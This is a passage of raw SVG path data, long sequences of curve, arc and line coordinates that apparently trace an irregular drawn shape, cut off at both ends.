.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.